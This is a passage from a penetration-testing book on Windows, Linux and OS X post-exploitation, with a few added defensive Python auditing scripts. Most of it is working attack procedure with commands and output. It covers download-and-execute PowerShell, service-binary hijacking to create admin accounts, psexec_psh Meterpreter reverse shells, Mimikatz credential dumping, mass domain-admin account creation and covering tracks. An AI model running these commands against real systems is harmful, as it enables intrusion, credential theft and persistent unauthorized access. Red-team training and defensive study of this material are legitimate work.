Directory environment may have multiple relationships with different Domains. {12} 


We used PowerView throughout the book for the multitude of tools that are incorporated in this 
PowerShell toolbag. One of these tools that helps infiltrate large organizations is called 
Invoke-MapDomainTrusts. Running this command will show the relationship between the different 
domain trusts. 


For example: 

• Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-MapDomainTrusts | Export-CSV -NoTypeInformation trusts.csv" 

The output: 

hacker.testlab,it.hacker.testlab,ParentChild,Bidirectional 
hacker.testlab,corp.hacker.testlab,ParentChild,Bidirectional 
corp.hacker.testlab,corp.alice.com,External,Inbound 
it.hacker.testlab,hacker.testlab,ParentChild,Bidirectional 
engineering.hacker.testlab,hacker.testlab,ParentChild,Bidirectional 
rockets.testlab,product.rockets.testlab,ParentChild,Bidirectional 
rockets.testlab,it.rockets.testlab,ParentChild,Bidirectional 


To find information about members of a given local group: 

• Powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Get-NetLocalGroup -HostName it.rockets.testlab" 


Since this all comes from harmj0y, I would highly recommend you read: 
http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/ 


Group Policy Preferences: 


In the last book, a great and inexpensive "domain user to local admin privilege escalation trick" was 
through Group Policy Preferences. Group Policy Preferences vulnerabilities have been patched in the 
newest Windows versions, but it should still be one of the first things to check. 


Group Policy Preferences is a powerful feature that makes a sysadmin's life much easier by deploying 
GPO settings across the whole environment. One of the features is that you can create/update local 
admin accounts on all the hosts within the domain. Why would someone use this feature? It might be 
because they want to push a new administrative local user onto every host or update the password for 
a local account on every machine (more common than you might think). Once this setting is configured 
and GPOs are updated, all workstations will have this account. The problem is that this 
information (the username/password of the local admin account) has to be stored somewhere, and in 
GPP's case it is stored on the domain and readable by any AD user account. Even worse, the 
AES key protecting these passwords was posted on Microsoft's site, allowing anyone to 
reverse the passwords. {13} 



If you are on a host that is authenticated to the network with any domain user, you can use the 
Metasploit modules with the following: 

• use post/windows/gather/credentials/gpp 

• set SESSION [Session # of your shell] 

• exploit 


This would get you a lot of easy cheap local administrative credentials, but after the Windows patch, 
I don’t see this as often. 

• https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb 

• https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1 

Or if you don't have a shell, just mount \\[Domain Controller]\SYSVOL\[Domain]\Policies, look for 
the Groups.xml file, and decrypt the hash using: 

http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py 
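The Python script below is an added example (not the book's, not the Metasploit or PowerSploit module, and not gpprefdecrypt.py): it walks a Group Policy Preference XML file such as Groups.xml and lists every entry that still carries a non-empty cpassword attribute, which is what a defender sweeping SYSVOL needs in order to find and remove these preferences. The XML is constructed for the example; its clsid values and ciphertext are placeholders, and the account attribute it reads (userName) is the one Groups.xml uses.

```python
"""Find Group Policy Preference entries that still carry a cpassword attribute.

Added example (not from the book or from the Metasploit/PowerSploit modules it
links): parse the XML that GPP writes under SYSVOL and list every preference
item whose Properties element has a non-empty cpassword, so an administrator
can locate and remove those preferences. The XML below is constructed for the
example; the clsid values and the ciphertext are placeholders, not real ones.
"""
import xml.etree.ElementTree as ET

SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CLSID-PLACEHOLDER}">
  <User clsid="{CLSID-PLACEHOLDER}" name="LocalAdmin" changed="2014-05-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER-CIPHERTEXT=="
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
  <User clsid="{CLSID-PLACEHOLDER}" name="Helpdesk" changed="2014-05-01 10:05:00">
    <Properties action="U" userName="Helpdesk" cpassword="" acctDisabled="0"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text):
    """Return one record per preference item whose Properties carry a non-empty cpassword.

    Groups.xml stores the account in the userName attribute; other preference
    types use different attribute names, so only the item tag, its display name
    and the change timestamp are guaranteed to be present in every record.
    """
    root = ET.fromstring(xml_text)
    hits = []
    # Iterate over every element so nested preference items are covered too.
    for item in root.iter():
        props = item.find("Properties")
        if props is None:
            continue
        if props.get("cpassword"):  # empty string means no stored password
            hits.append({
                "item": item.tag,
                "name": item.get("name"),
                "account": props.get("userName"),
                "changed": item.get("changed"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{hit['item']} '{hit['name']}' sets a password for "
              f"{hit['account']} (last changed {hit['changed']})")
```

Pointed at the Policies directory on a domain controller, the same function applied to each XML file found gives a defender the list of GPOs whose stored passwords must be considered compromised and removed; it deliberately does not decrypt anything.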


OS X Enumeration 

OSXCollector (https://github.com/Yelp/osxcollector) (OS X): 

OS X and Linux detailed post exploitation guides are listed below. In addition to those guides, I 
wanted to integrate how incident response techniques can support penetration testers. Yelp created a 
tool called OSXCollector, which is a forensic evidence collection and analysis toolkit for OS X. 
This tool is used to speed up incidents and investigations on compromised Macs. As a penetration 
tester, we can use these same tools to perform our information gathering automation. Let’s see this in 
action: 


• curl "https://codeload.github.com/Yelp/osxcollector/zip/master" -o osxcollector.zip 

• unzip osxcollector.zip 

• cd osxcollector-master/osxcollector 

• sudo python osxcollector.py 


admins-MacBook-Pro:osxcollect-2015_04_22-23_28_08 admin$ ls -alh 
total 319408 
drwxr-xr-x   16 admin  staff   544B Apr 22 23:45 . 
drwxr-xr-x@   7 admin  staff   238B Apr 22 23:39 .. 
-rw-r--r--    1 admin  staff   3.4K Apr 22 23:39 LKDC-setup.log 
-rw-r--r--    1 admin  staff   347B Apr 22 23:39 VMware Fusion Services.log 
-rw-r--r--    1 admin  staff   155M Apr 22 23:39 osxcollect-2015_04_22-23_28_08.json 
-rw-r--r--    1 admin  staff     0B Apr 22 23:39 stackshot-syms.log 
-rw-r--r--    1 admin  staff     0B Apr 22 23:39 stackshot.log 
-rw-r--r--    1 admin  staff   264K Apr 22 23:39 system.log 
-rw-r--r--    1 admin  staff   6.5K Apr 22 23:39 system.log.0.gz 
-rw-r--r--    1 admin  staff    35K Apr 22 23:39 system.log.1.gz 
-rw-r--r--    1 admin  staff    55K Apr 22 23:39 system.log.2.gz 
-rw-r--r--    1 admin  staff    22K Apr 22 23:39 system.log.3.gz 
-rw-r--r--    1 admin  staff    43K Apr 22 23:39 system.log.4.gz 
-rw-r--r--    1 admin  staff    37K Apr 22 23:39 system.log.5.gz 
-rw-r--r--    1 admin  staff    47K Apr 22 23:39 system.log.6.gz 
-rw-r--r--    1 admin  staff    47K Apr 22 23:39 system.log.7.gz 


OSXCollector Output 






After OSXCollector finishes, a tar.gz file is created with the date timestamp. Extracting the tar.gz 
file (tar xzvf osxcollect-*.tar.gz), we see a file listing similar to the one above. These contain all the 
system log files, but more important is the json file. What is in the json file: 

• Full browser information (history, cookies, login data, etc.) 

• Information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, 
StartupItems and other login items 

• Information from Mail and more 

• User accounts 

• For full detail see: 
https://github.com/Yelp/osxcollector 

Why is this important to a red team? Inside this json file I have found passwords, session cookies, 
sensitive web browsing data, certificate data, and much more. Luckily, you can do most of this 
investigation offline and reuse cookies to log into sensitive websites. 


Additional Post Exploitation Tips 


Rob Fuller (Mubix) and room362.com have very comprehensive lists on additional Post Exploitation. 
Post Exploitation Lists from Room362.com: {14} 

• Linux/Unix/BSD Post Exploitation: http://bit.ly/pqTxA5 

• Windows Post Exploitation: http://bit.ly/1em7gvG 

• OSX Post Exploitation: http://bit.ly/1kVTIMf 

• Obscure System's Post Exploitation: http://bit.ly/18dvL0I 

• Metasploit Post Exploitation: http://bit.ly/JpJ1TR 


Privilege Escalation: 


If you end up in an environment with restrictive users, you might have issues moving laterally or 
performing elevated attacks. Without being an administrative user on a host, you are limited in pulling 
hashes, installing software, changing firewall rules, modifying the registry and more. I have dedicated 
a quick section for getting from a regular user to a local administrator in this Zero to Hero section. 


Zero to Hero - Windows: 

After the initial compromise, one of the biggest issues is moving from a regular user to an 
administrative user. With a regular user, you lack the ability to make modifications to the registry, 
install software, bypass UAC, pull hashes, and most of all become SYSTEM. 

In the prior chapter, we talked about looking at open shares for password lists or for configuration 
files. In this section, we will discuss how to look for vulnerabilities and issues on the host system to 
get to SYSTEM. 


As a member of the Users group with no administrative privileges, we need to look for 
misconfigurations. What are the things we might look for? 


Option 1: 

The first common privilege escalation I see is services whose executable files have misconfigured 
permissions. We know that services execute at boot and call an executable to run in the background. 
For example, think of the Java updater. This runs every time you boot up and checks Oracle to see if 
you have the latest version of Java. It is always running and generally runs as a privileged local account. 


This means if an executable that is called by a service is writable by a limited user, we can replace 
it with a file we created, which will allow our new file to execute as SYSTEM every time the service 
starts. 


Luckily for us, harmj0y created a tool called PowerUp to look for these issues: 
https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp 


To run PowerUp, we will use the standard PowerShell command to download and execute 
Invoke-AllChecks: 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-AllChecks 


C:\Users\testaccount> powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks 

[*] Running Invoke-AllChecks 

[*] Checking for unquoted service paths... 
[*] Use 'Write-UserAddServiceBinary' to abuse 
[+] Unquoted service path: DACoreService - C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe 

[*] Checking service executable permissions... 
[*] Use 'Write-ServiceEXE -ServiceName SVC' to abuse 
[+] Vulnerable service executable: omniserv - "C:\Program Files\Fingerprint Manager Pro\OmniServ.exe" 

[*] Checking service permissions... 

[*] Checking for unattended install files... 

[*] Checking %PATH% for potentially hijackable .dll locations... 
[+] Hijackable .dll path: C:\Program Files\Fingerprint Manager Pro\ 
[+] Hijackable .dll path: C:\ProgramData\ReadyApp 
[*] Checking for AlwaysInstallElevated registry key... 


PowerUp Example 


We see that the service omniserv is vulnerable to the Write-ServiceEXE issue. How can we confirm 
that we have the ability to write to C:\Program Files\Fingerprint Manager Pro\OmniServ.exe? 


There is a default Windows program called icacls to view file permissions. For example, running 
icacls on this file, we would see an output of: 

• icacls "C:\Program Files\Fingerprint Manager Pro\OmniServ.exe" 

C:\Program Files\Fingerprint Manager Pro\OmniServ.exe 
Everyone:(I)(F) 
NT AUTHORITY\SYSTEM:(I)(F) 
BUILTIN\Administrators:(I)(F) 
BUILTIN\Users:(I)(RX) 
laptop\testaccount:(I)(F) 
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) 

For this file, we can see that Everyone has (F) or full access to modify this executable. If we can 
replace this service file with another service executable, we can potentially take advantage of system 
privileges. 
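As an added example (not from the book or from PowerUp), the Python script below parses icacls output of the shape shown above, constructed here from that listing, and reports every principal holding a write-capable right on the file, calling out broad groups such as Everyone or BUILTIN\Users separately, since those are the grants an administrator has to remove. It assumes the path is on its own line followed by one ACE per line, as in the listing; the set of rights treated as write-capable is this example's own choice.

```python
"""Audit icacls output for principals that can modify a service binary.

Added example (not from the book or from PowerUp): parse the ACL listing that
icacls prints and report every principal holding a write-capable right. Broad
groups (Everyone, Users, Authenticated Users) are called out separately, since a
service executable writable by them is the condition PowerUp flags. The output
below is constructed from the listing in the text; the parser assumes the path
is on its own line with one ACE per following line, as shown there.
"""
import re

SAMPLE_ICACLS = r"""C:\Program Files\Fingerprint Manager Pro\OmniServ.exe
Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
laptop\testaccount:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Rights that let the file be replaced or rewritten: the simple rights F (full),
# M (modify), W (write) and D (delete), plus the specific rights implying them.
# This selection is the example's own assumption.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DE", "WDAC", "WO"}
# Inheritance flags share the parenthesised syntax but are not rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
BROAD_PRINCIPALS = {"everyone", "builtin\\users", "users",
                    "nt authority\\authenticated users", "authenticated users"}

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<aces>(?:\([^)]*\))+)\s*$")


def parse_icacls(text):
    """Return (path, [(principal, rights_set, is_deny), ...]) from icacls output."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    path = lines[0].strip()
    entries = []
    for line in lines[1:]:
        m = ACE_RE.match(line.strip())
        if not m:
            continue  # summary line, not an ACE
        tokens = re.findall(r"\(([^)]*)\)", m.group("aces"))
        rights, deny = set(), False
        for tok in tokens:
            for part in tok.split(","):
                part = part.strip()
                if part == "DENY":
                    deny = True
                elif part and part not in INHERIT_FLAGS:
                    rights.add(part)
        entries.append((m.group("who").strip(), rights, deny))
    return path, entries


def audit_icacls(text):
    """List principals with write-capable access; flag broad groups separately."""
    path, entries = parse_icacls(text)
    writable, broad = [], []
    for who, rights, deny in entries:
        if deny or not (rights & WRITE_RIGHTS):
            continue  # a deny ACE or read-only rights cannot replace the file
        writable.append(who)
        if who.lower() in BROAD_PRINCIPALS:
            broad.append(who)
    return {"path": path, "writable_by": writable, "broad_writable_by": broad}


if __name__ == "__main__":
    report = audit_icacls(SAMPLE_ICACLS)
    print(report["path"])
    print("  writable by:", ", ".join(report["writable_by"]))
    print("  broad groups with write access:", ", ".join(report["broad_writable_by"]) or "none")
```

On the listing above the only broad grant is Everyone:(F); the expected state for a binary run as LocalSystem is that only SYSTEM, Administrators and TrustedInstaller appear in the writable list.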

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Write-ServiceEXE -ServiceName omniserv -Username newaccount -Password 
Asdfasdfl -Verbose 


C:\Users\testaccount> powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/PowerUp.ps1'); Write-ServiceEXE -ServiceName omniserv -Username newaccount -Password Asdfasdfl -Verbose 

VERBOSE: Backing up 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe' to 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe.bak' 
[+] Binary for service 'omniserv' to create user 'newaccount : Asdfasdfl' written to 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe' 

C:\Users\testaccount> net stop omniserv 
System error 5 has occurred. 

Access is denied. 


Vulnerable Service File 


If possible, you can try to stop and start the service, but in this case, due to being a limited user, we 
need to wait for a reboot to occur. To force a reboot, we can push this command: 

• shutdown -r -f -t 0 


After a reboot or an administrative account starting and stopping of the service, a new account called 
“newaccount” and Password of “Asdfasdfl” is created with Administrative Privileges. Just log back 
in and you are now a local admin. 


Administrator: Command Prompt 

C:\windows\system32>net stop omniserv 
The Fingerprint Manager Pro Service service is stopping. 
The Fingerprint Manager Pro Service service was stopped successfully. 

C:\windows\system32>net start omniserv 
The Fingerprint Manager Pro Service service is starting. 
The Fingerprint Manager Pro Service service was started successfully. 

C:\windows\system32> 

Screenshot: Local Users and Groups lists the users Administrator, Guest, helpdesk and newaccount; 
the Member Of tab of newaccount shows it as a member of Administrators and Users. 


PowerUp Privilege Escalation 


Removing your tracks is always important, so we need to make sure we set everything back to its 
original state after we get our admin account. Luckily again, harmj0y created a restore function to put 
the original executable back: 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/PowerUp.ps1'); Restore-ServiceEXE -ServiceName omniserv 

o Restoring up 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe.bak' to 
'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe' 

o Removing backup binary 'C:\Program Files\Fingerprint Manager Pro\OmniServ.exe.bak' 


Option 2: 

Metasploit has released a local exploitation module called Windows Service Trusted Path Privilege 
Escalation. {15} 


The concept of this vulnerability is to look for services that have unquoted paths for the files they 
execute. In other words, if a service calls an executable like C:\Program Files\Demo File\Demo.exe 
and it doesn't properly quote the full path name, we can take advantage of this. If we look at the 
folder name from our example, \Demo File\, we see that there is a space between Demo and File. In 
Windows, this can either be treated as "\Demo File\" or, if there happened to be a Demo.exe file in 
"C:\Program Files\", it would execute the command "\Demo.exe File\". To visualize this issue, let's 
look at two strings. The quoted string in the picture below is from the omniserv service from our 
prior example. We see that the BINARY_PATH_NAME has quotes around the executable path. 
However, the service DACoreService calls a file that is not quoted. This is where the problem stems 
from. 


C:\Users\testaccount\Desktop>sc qc omniserv 
[SC] QueryServiceConfig SUCCESS 

SERVICE_NAME: omniserv 
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START 
        ERROR_CONTROL      : 1   NORMAL 
        BINARY_PATH_NAME   : "C:\Program Files\Fingerprint Manager Pro\OmniServ.exe" 
        LOAD_ORDER_GROUP   : COM Infrastructure 
        TAG                : 0 
        DISPLAY_NAME       : Fingerprint Manager Pro Service 
        DEPENDENCIES       : rpcss 
        SERVICE_START_NAME : LocalSystem 

C:\Users\testaccount\Desktop>sc qc DACoreService 
[SC] QueryServiceConfig SUCCESS 

SERVICE_NAME: DACoreService 
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START 
        ERROR_CONTROL      : 1   NORMAL 
        BINARY_PATH_NAME   : C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe 
        LOAD_ORDER_GROUP   : 
        TAG                : 0 
        DISPLAY_NAME       : Dragon Assistant Core 
        DEPENDENCIES       : rpcss 
        SERVICE_START_NAME : LocalSystem 


Unquoted Vulnerability 


In this example, C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe, we could create a file at 
C:\Program Files (x86)\Dragon.exe and Windows would execute Dragon.exe, treating the rest of the 
path as its arguments. To execute a file as a potential SYSTEM user, we just need to create a service 
executable in the path. Let's walk through the whole process. 


First, we need to identify if we have any Trusted Path Issues. From the Invoke-AllChecks output above, 
we see that DACoreService is vulnerable to the unquoted service path vulnerability. 


• [*] Checking for unquoted service paths... 

• [*] Use 'Write-UserAddServiceBinary' to abuse 

• [+] Unquoted service path: DACoreService - C:\Program Files (x86)\Dragon 
Assistant\Core\DACore.exe 

Let’s take advantage of it. Again, we will call: 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Write-UserAddServiceBinary -ServiceName DACoreService -Path Dragon.exe 


Now, if you have the proper privileges, move Dragon.exe to C:\Program Files (x86)\. When we get a 
reboot or when an admin stops and starts the DACoreService service, we will get a new user account 
(John) as part of the Administrators Group. 


Reboot the host: 

• shutdown -r -f -t 0 


C:\windows\system32>net stop DACoreService 
The Dragon Assistant Core service is stopping. 
The Dragon Assistant Core service was stopped successfully. 

Screenshot: lusrmgr (Local Users and Groups) lists the users Administrator, Guest, helpdesk and john, 
with the john Properties dialog open on its Member Of tab. 


PowerUp - Account Creation 


Zero To Hero - Linux: 


On Linux, we run into the same issues. We are looking for files that are world-writable, SUID/SGID 
files owned by root, and misconfigurations. Two different tools to look for these privileges are 
unix-privesc-check and LinEnum: 

• https://code.google.com/p/unix-privesc-check/source/checkout 

• https://github.com/rebootuser/LinEnum 

Move this software over to the victim host and run it. 

Lastly, for a good list of Linux/Unix based privilege escalation exploits: 

• https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack 


With Any Local Administrative or Domain Admin Account: 


Hopefully, in the prior chapter, you were able to gain access to a local administrative account that 
works on all of the users’ machines or maybe even a domain admin account. What are some of the 
next steps for your newly-found credentials? This section is dedicated to continually owning the 
network. 


Owning The Network With Credentials And Psexec: 


In my last book, once you had a username and password, if you wanted to get another Meterpreter 
shell on another host, you had to use psexec. The problem was that the default payload would trigger 
most AV systems, so we had to create a Meterpreter payload first using Veil and attach that. Let’s 
go through that first to see what we used to do: 

• Go to Veil located in /opt/Veil and execute ./Veil 

• list and use payload 

• set your LHOST and LPORT 

• generate using pyinstaller 

• Now go to Metasploit, use psexec with the custom payload 

o msfconsole 

o use exploit/windows/smb/psexec 

o set PAYLOAD windows/meterpreter/reverse_https 

o set LHOST [IP of My Box] 

o set LPORT 443 

o set SMBUser TestAccount 

o set SMBPass MyPassword 

o set SMBDomain fakeDomain 

o set EXE::Custom /root/veil-output/compiled/veil_file.exe 

o set RHOST [IP of Remote Host] 


This worked great in the past and we were able to get around AV. Additionally, I have seen some AV 
in the past year start picking up on Python executable payloads. As seen throughout the book, this is 
definitely a cat-and-mouse game. That is what makes penetration testing so much fun. 


This is where psexec_psh comes into play. Just like psexec, what psexec_psh does is mimic the 
Sysinternals tool psexec to log into the victim host and execute a payload. What psexec_psh does 
differently is use PowerShell encoded commands to mimic the old psexec. You will get back a 
Meterpreter shell, but this time nothing will touch disk at all. No need to create a custom payload to 
evade AV. 


• use exploit/windows/smb/psexec_psh 

• set RHOST 172.16.151.202 

• set SMBUser lab 

• set SMBPass '!Asdfasdfasdf1!' 

• set SMBDomain hacker.testlab 

• set LHOST 172.16.151.141 

• set PAYLOAD windows/meterpreter/reverse_https 

• exploit 


msf > use exploit/windows/smb/psexec_psh 
msf exploit(psexec_psh) > set RHOST 172.16.151.202 
RHOST => 172.16.151.202 
msf exploit(psexec_psh) > set SMBUser lab 
SMBUser => lab 
msf exploit(psexec_psh) > set SMBPass '!Asdfasdfasdf1!' 
SMBPass => !Asdfasdfasdf1! 
msf exploit(psexec_psh) > set SMBDomain hacker.testlab 
SMBDomain => hacker.testlab 
msf exploit(psexec_psh) > set LHOST 172.16.151.141 
LHOST => 172.16.151.141 
msf exploit(psexec_psh) > set PAYLOAD windows/meterpreter/reverse_https 
PAYLOAD => windows/meterpreter/reverse_https 
msf exploit(psexec_psh) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/ 
[*] 172.16.151.202:445 - Executing the payload... 
[+] 172.16.151.202:445 - Service start timed out, OK if running a command or non-service executable... 
[*] Meterpreter session 1 opened (172.16.151.141:8443 -> 172.16.151.202:49196) 

meterpreter > 


psexec_psh 


Now moving laterally through the network becomes that much easier and that much more silent. 

Once we have a successful Meterpreter session, we will interact with that session with the command: 

• sessions -i [session number] 


One of the common next steps is to run Mimikatz against the system. If you run into a system that is a 
64-bit system, you will have to first migrate into a 64-bit process. The reason I want to utilize a 
64-bit process is because that is the only way Mimikatz will be able to look for the clear text passwords 
on 64-bit systems. If it is a 32-bit system, you can still migrate into another process if needed, but it 
might not be necessary. 

To list all of the processes, we will use the "ps" command. To migrate, we will use the command 
"migrate [pid]". In the example below, we identified Notepad running as a 64-bit process and 
migrated into it. 

• ps 

• migrate [pid of a x86_64 process] 


You might need to become "system" before doing any of these commands. You can do this by issuing 
the following command: 

• getsystem 

• If you get denied and are a local admin, see the Bypass UAC section. 


Once migrated and running as system, we want to load Mimikatz and type the command kerberos (or 
you can use wdigest). This should give us the clear text passwords of the users currently logged in. 

• kerberos 

• wdigest 


msf exploit(psexec_psh) > sessions -i 5 
[*] Starting interaction with 5... 

meterpreter > ps 
 ... 
 12668  708    conhost.exe   x86_64  1  ...\system32\conhost.exe 
 12864  10800  chrome.exe    x86     1  ...\Google\Chrome\Application\chrome.exe 
 13036  3040   notepad.exe   x86_64  1  ...\system32\notepad.exe 

meterpreter > migrate 3040 
[*] Migrating from 10760 to 3040... 
[*] Migration completed successfully. 
meterpreter > load mimikatz 
Loading extension mimikatz...success. 
meterpreter > kerberos 
[!] Not currently running as SYSTEM 
[*] Attempting to getprivs 
[+] Got SeDebugPrivilege 
[*] Retrieving kerberos credentials 
kerberos credentials 
==================== 

AuthID     Package    Domain        User           Password 
------     -------    ------        ----           -------- 
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE 
0;182290   Kerberos   fakeDomain    TestAccount    MyPassword 
0;1825757  Kerberos   fakeDomain    TestAccount2   MyPassword2 


Mimikatz 


We now have another account and password to utilize. In addition to Mimikatz, there are also other 
post modules in Metasploit that you might want to look into, such as Incognito {16} and 
Smart HashDump {17}. These should get you enough access on this host for the time being. 


Psexec Commands Across Multiple IPs (Kali Linux) 


Since we have credentials that have local administrative access, there are times when I don't want to 
compromise every host, and instead, just run commands on these hosts. For example, some commands 
you may want to run on all hosts are: 

• net group "Domain Admins" /domain (list all Domain Admins on servers) 

• qwinsta (list user session information) 

• Create Additional Administrative Accounts on All Hosts 

o net user username password /ADD /DOMAIN 
o net group "Domain Admins" username /ADD /DOMAIN 
o net localgroup Administrators username /ADD 


Royce Davis took the original psexec code and modified it so it does not upload any binaries, but 
achieves command-line remote code execution in memory. This allows you to avoid AV detection and 
run threaded commands on multiple systems. I will show you a quick example: {18} 

• use auxiliary/admin/smb/psexec_command 

• set RHOSTS [IP or IP Range] 

• set SMBDomain [Domain Info] 

• set SMBPass [Password] 

• set SMBUser [User] 

• set COMMAND [command you want to run at the command line] 

• exploit 



msf > use auxiliary/admin/smb/psexec_command 
msf auxiliary(psexec_command) > set RHOSTS 172.16.139.196 
RHOSTS => 172.16.139.196 
msf auxiliary(psexec_command) > set SMBDomain corp.fakedomain.testlab 
SMBDomain => corp.fakedomain.testlab 
msf auxiliary(psexec_command) > set SMBPass !Admin1Account! 
SMBPass => !Admin1Account! 
msf auxiliary(psexec_command) > set SMBUser AdminAccount 
SMBUser => AdminAccount 
msf auxiliary(psexec_command) > set COMMAND qwinsta 
COMMAND => qwinsta 
msf auxiliary(psexec_command) > show options 

Module options (auxiliary/admin/smb/psexec_command): 

   Name       Current Setting          Required 
   ----       ---------------          -------- 
   COMMAND    qwinsta                  yes 
   RHOSTS     172.16.139.196           yes 
   RPORT      445                      yes 
   SMBDomain  corp.fakedomain.testlab  no 
   SMBPass    !Admin1Account!          no 
   SMBSHARE   C$                       yes 
   SMBUser    AdminAccount             no 
   THREADS    1                        yes 
   WINPATH    WINDOWS                  yes 

msf auxiliary(psexec_command) > exploit 

[*] 172.16.139.196:445 - Executing the command... 
[*] 172.16.139.196:445 - Getting the command output... 
[+] 172.16.139.196:445 - Command completed successfully! Output: 
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE 
 services                                    0  Disc 
 console           administrator             1  Active 
[*] 172.16.139.196:445 - Executing cleanup... 
[*] 172.16.139.196:445 - Cleanup was successful 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


psexec_command 































In the Pregame chapter, during the Setting Up Your Box phase, you had the option of enabling logging 
for Metasploit. This is one area where logging can be very helpful. If you want to execute code on a /24 
network or larger, the output is going to be pretty extensive. If you need to parse through it, it is much 
easier to have Metasploit log the traffic and grep that file. In the previous command, I was able to run 
the qwinsta command on every host and link IPs with usernames. If I have a list of IT administrators, I 
can directly attack their box instead of compromising all the hosts on the network. 
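The linking step described above, as an added Python example that is not part of the book: it parses the per-host qwinsta output that psexec_command prints and lists the hosts where named privileged accounts hold interactive sessions (the same question a defender asks when hunting for exposed admin logons); the log text is constructed to match the module output shown earlier.

```python
"""Link hosts to logged-on users from a Metasploit psexec_command log."""
import re
from typing import Dict, Iterable, List, Tuple

# Module line that precedes a host's command output.
RESULT_RE = re.compile(
    r"^\[\+\] (\d{1,3}(?:\.\d{1,3}){3}):\d+ - Command completed successfully! Output")
# qwinsta row: SESSIONNAME, optional USERNAME, numeric ID, STATE (TYPE/DEVICE ignored).
ROW_RE = re.compile(r"^\s*(\S+)\s+(?:(\S+)\s+)?(\d+)\s+(\S+)")

Session = Tuple[str, str, str]  # (session name, username, state)


def parse_psexec_command_log(log: str) -> Dict[str, List[Session]]:
    """Map each host IP to the qwinsta rows that carry a username."""
    sessions: Dict[str, List[Session]] = {}
    current = None
    for line in log.splitlines():
        m = RESULT_RE.match(line)
        if m:
            current = m.group(1)
            sessions.setdefault(current, [])
            continue
        if line.startswith("["):  # any other module status line ends the output block
            current = None
            continue
        if current is None:
            continue
        r = ROW_RE.match(line)
        if r and r.group(2):  # skips the header and user-less rows (services, listeners)
            sessions[current].append((r.group(1), r.group(2), r.group(4)))
    return sessions


def hosts_with_privileged_sessions(sessions: Dict[str, List[Session]],
                                   privileged: Iterable[str]) -> Dict[str, List[str]]:
    """Hosts on which any of the given accounts is logged on, with those accounts."""
    priv = {p.lower() for p in privileged}
    result: Dict[str, List[str]] = {}
    for ip, rows in sessions.items():
        found = sorted({user for _, user, _ in rows if user.lower() in priv})
        if found:
            result[ip] = found
    return result


# Constructed sample log, two hosts, same layout as the module output above.
SAMPLE_LOG = """\
[*] 172.16.139.196:445 - Executing the command...
[*] 172.16.139.196:445 - Getting the command output...
[+] 172.16.139.196:445 - Command completed successfully! Output:
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           administrator             1  Active
[*] 172.16.139.196:445 - Executing cleanup...
[*] 172.16.139.196:445 - Cleanup was successful
[+] 172.16.139.197:445 - Command completed successfully! Output:
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           jdoe                      1  Active
 rdp-tcp#3         helpdesk                  2  Active  rdpwd
 rdp-tcp                                 65536  Listen
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

if __name__ == "__main__":
    parsed = parse_psexec_command_log(SAMPLE_LOG)
    print(hosts_with_privileged_sessions(parsed, ["administrator", "helpdesk"]))
```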


Move Laterally With WMI (Windows) 


